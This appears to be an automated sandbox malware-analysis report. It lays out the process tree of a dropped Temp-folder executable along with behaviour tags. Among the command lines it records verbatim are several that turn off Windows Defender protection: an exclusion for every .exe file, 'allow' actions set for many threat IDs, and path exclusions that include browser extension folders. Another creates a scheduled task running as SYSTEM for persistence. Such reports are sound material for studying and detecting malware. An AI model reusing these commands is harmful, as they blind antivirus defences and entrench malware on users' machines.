C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21244⤵
- Program crash
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exeC:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 07:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exe\" z0 /QVdidS 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 8125⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 19524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 14284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 13964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 20204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 20124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 11084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 19804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 23084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21804⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 21844⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18204⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9684⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22764⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18204⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 9684⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 18364⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22564⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 22084⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2096 -ip 20961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2096 -ip 20961⤵
-
C:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exeC:\Users\Admin\AppData\Local\Temp\AU1ATHk1\pGHmpeMOFHEUw.exe z0 /QVdidS 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵
-
